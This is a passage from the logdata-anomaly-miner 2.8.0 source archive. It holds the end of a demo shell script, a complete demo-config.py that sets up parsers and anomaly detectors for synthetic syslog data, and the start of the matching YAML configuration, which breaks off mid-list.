#Comment #stop aminer sleep 3 & wait $! sudo pkill -x aminer.py wait $PID RES=$? sudo rm $LOGFILE exit $RES logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminer/demo-config.py000066400000000000000000000763121500476301700257520ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = [{'url': b'file:///tmp/syslog', 'parser_id': 'model'}] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' config_properties['Core.PersistencePeriod'] = 600 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' config_properties['Log.StatisticsPeriod'] = 3600 config_properties['Log.StatisticsLevel'] = 1 config_properties['Log.DebugLevel'] = 1 config_properties['Log.Rotation.BackupCount'] = 5 config_properties['Log.Rotation.MaxBytes'] = 104857600 # 100 Megabytes config_properties['AminerId'] = 'demo-aminer' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: import pytz from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User/LoginDetails', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement( 'PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [ SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User/UserIPAddress', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_audit = [ SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S', pytz.timezone('UTC')), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('se', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('se2', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) import locale loc = locale.getlocale() if loc == (None, None): loc = ('en_US', 'utf8') service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)])) service_children_parsing_model_element.append( RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append( SequenceModelElement('se', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('fixed', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets to the # AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append(OptionalMatchModelElement( '/', FirstMatchModelElement('FirstMatchModelElement//optional', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), SequenceModelElement('se', [ FixedDataModelElement('FixedDME', b'Any:'), AnyByteDataModelElement('AnyByteDataModelElement')])]))) alphabet = b'ghijkl' service_children_ecd = [] for _, char in enumerate(alphabet): char = bytes([char]) service_children_ecd.append(FixedDataModelElement(char.decode(), char)) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('type', service_children_audit), FirstMatchModelElement('ECD', service_children_ecd), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, default_timestamp_path_list=["/model/DailyCron/DTM"], use_real_time=True) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False) analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler") verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model) atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')), Rules.DebugMatchRule(debug_match_result=True)]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails'), Rules.DebugMatchRule(debug_match_result=True)]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filter.add_handler(parser_count) from aminer.analysis.EventTypeDetector import EventTypeDetector etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers) analysis_context.register_component(etd, component_name="EventTypeDetector") atom_filter.add_handler(etd) from aminer.analysis.VariableTypeDetector import VariableTypeDetector vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False, output_logline=False, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableTypeDetector") atom_filter.add_handler(vtd) from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableCorrelationDetector") atom_filter.add_handler(vtd) from aminer.analysis.TSAArimaDetector import TSAArimaDetector tsaad = TSAArimaDetector(analysis_context.aminer_config, anomaly_event_handlers, etd) analysis_context.register_component(tsaad, component_name="TSAArimaDetector") atom_filter.add_handler(tsaad) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0, learn_mode=True) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filter.add_handler(ecd) from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector efd = EventFrequencyDetector(analysis_context.aminer_config, anomaly_event_handlers, window_size=0.5) analysis_context.register_component(efd, component_name="EventFrequencyDetector") atom_filter.add_handler(efd) from aminer.analysis.EventSequenceDetector import EventSequenceDetector esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime', '/model/DailyCron']) analysis_context.register_component(esd, component_name="EventSequenceDetector") atom_filter.add_handler(esd) from aminer.analysis.MatchFilter import MatchFilter match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[ 1, 10, 100], output_logline=True) analysis_context.register_component(match_filter, component_name="MatchFilter") atom_filter.add_handler(match_filter) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function, output_logline=True) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) import re ip_match_action = Rules.EventGenerationMatchAction( "Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers) vdmt = Rules.ValueDependentModuloTimeMatchRule("vdmtmr", 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3]) mt = Rules.ModuloTimeMatchRule("mtmr", 3, 0, 3, None) time_allowlist_rules = [ Rules.AndMatchRule([ Rules.ParallelMatchRule([ Rules.ValueDependentDelegatedMatchRule([ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], { (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt}, mt), Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action), Rules.DebugHistoryMatchRule(debug_match_result=True) ]), # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])), Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)), Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$"))) ]) ] time_allowlist_violation_detector = AllowlistViolationDetector( analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist") atom_filter.add_handler(time_allowlist_violation_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector( analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10, output_logline=True) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, output_logline=True, learn_mode=True, log_resource_ignore_list=['file:///tmp/other_syslog']) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector( analysis_context.aminer_config, ['/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filter.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5, output_logline=True) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=10000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminer/demo-config.yml000066400000000000000000000710621500476301700261200ustar00rootroot00000000000000LearnMode: False Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - url: 'file:///tmp/syslog' parser_id: 'model' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 AminerId: 'demo-aminer' Parser: - id: space type: FixedDataModelElement name: 'Space' args: ' Current Disk Data is: Filesystem Type Size Used Avail Use%' - id: data type: DelimitedDataModelElement name: 'Data' delimiter: '%''/' - id: rest type: AnyByteDataModelElement name: 'Rest' - id: userLoginDetails type: FixedDataModelElement name: 'User' args: 'User ' - id: userIpAddress type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' delimiter: ' ' - id: status type: FixedWordlistDataModelElement name: 'Status' args: - ' logged in' - ' logged out' - id: blank type: FixedDataModelElement name: 'Blank' args: ' ' - id: minutes type: DecimalIntegerValueModelElement name: 'Minutes' - id: ago type: FixedDataModelElement name: 'Ago' args: ' minutes ago.' - id: time type: SequenceModelElement name: 'Time' args: - blank - minutes - ago - id: pastTime type: OptionalMatchModelElement name: 'PastTime' args: time - id: dtm type: DateTimeModelElement name: 'DTM' date_format: '%Y-%m-%d %H:%M:%S' start_year: null text_locale: null max_time_jump_seconds: 86400 - id: uNameSpace1 type: FixedDataModelElement name: 'UNameSpace1' args: ' ' - id: uName type: DelimitedDataModelElement name: 'UName' delimiter: ' ' - id: uNameSpace2 type: FixedDataModelElement name: 'UNameSpace2' args: ' ' - id: delimitedUser type: DelimitedDataModelElement name: 'User' delimiter: ' ' - id: cron type: FixedDataModelElement name: 'Cron' args: ' cron[' - id: jobNumber type: DecimalIntegerValueModelElement name: 'JobNumber' - id: details type: FixedDataModelElement name: 'Details' args: ']: Job `cron.daily` started.' - id: spaceRandom type: FixedDataModelElement name: 'Space' args: 'Random: ' - id: random type: DecimalIntegerValueModelElement name: 'Random' - id: fixedTemp type: FixedDataModelElement name: 'FixedTemp' args: 'CPU Temp: ' - id: temp type: DecimalIntegerValueModelElement name: 'Temp' - id: degrees type: FixedDataModelElement name: 'Degrees' args: '°C' - id: cpuTemp type: SequenceModelElement name: 'CPUTemp' args: - fixedTemp - temp - degrees - id: space1 type: FixedDataModelElement name: 'Space1' args: ', ' - id: fixedWorkload type: FixedDataModelElement name: 'FixedWorkload' args: 'CPU Workload: ' - id: workload type: DecimalIntegerValueModelElement name: 'Workload' - id: percent type: FixedDataModelElement name: 'Percent' args: '%' - id: cpuWorkload type: SequenceModelElement name: 'CPUWorkload' args: - fixedWorkload - workload - percent - id: space2 type: FixedDataModelElement name: 'Space2' args: ', ' - id: action type: FixedDataModelElement name: 'Action' args: ' changed IP address to ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: fixedSpace type: FixedDataModelElement name: 'Space' args: ' ' - id: run type: FixedDataModelElement name: 'Run' args: ']: Will run job `' - id: cronType type: FixedWordlistDataModelElement name: 'CronType' args: - 'cron.daily' - 'cron.hourly' - 'cron.monthly' - 'cron.weekly' - id: startTime type: FixedDataModelElement name: 'StartTime' args: "' in 5 min." - id: emptySpace1 type: FixedDataModelElement name: 'Space1' args: ' ' - id: job type: FixedDataModelElement name: 'Job' args: ']: Job `' - id: started type: FixedDataModelElement name: 'Started' args: "' started" - id: typePath type: FixedDataModelElement name: 'type' args: 'type=PATH ' - id: msgAudit type: FixedDataModelElement name: 'msg_audit' args: 'msg=audit(' - id: msg type: DelimitedDataModelElement name: 'msg' delimiter: ':' - id: placeholder type: FixedDataModelElement name: 'placeholder' args: ':' - id: id type: DecimalIntegerValueModelElement name: 'id' - id: item_string type: FixedDataModelElement name: 'item_string' args: '): item=' - id: item type: DecimalIntegerValueModelElement name: 'item' - id: name_string type: FixedDataModelElement name: 'name_string' args: ' name="' - id: name type: DelimitedDataModelElement name: 'name' delimiter: '"' - id: inode_string type: FixedDataModelElement name: 'inode_string' args: '" inode=' - id: inode type: DecimalIntegerValueModelElement name: 'inode' - id: dev_string type: FixedDataModelElement name: 'dev_string' args: ' dev=' - id: dev type: DelimitedDataModelElement name: 'dev' delimiter: ' ' - id: mode_string type: FixedDataModelElement name: 'mode_string' args: ' mode=' - id: mode type: DecimalIntegerValueModelElement name: 'mode' value_pad_type: "zero" - id: ouid_string type: FixedDataModelElement name: 'ouid_string' args: ' ouid=' - id: ouid type: 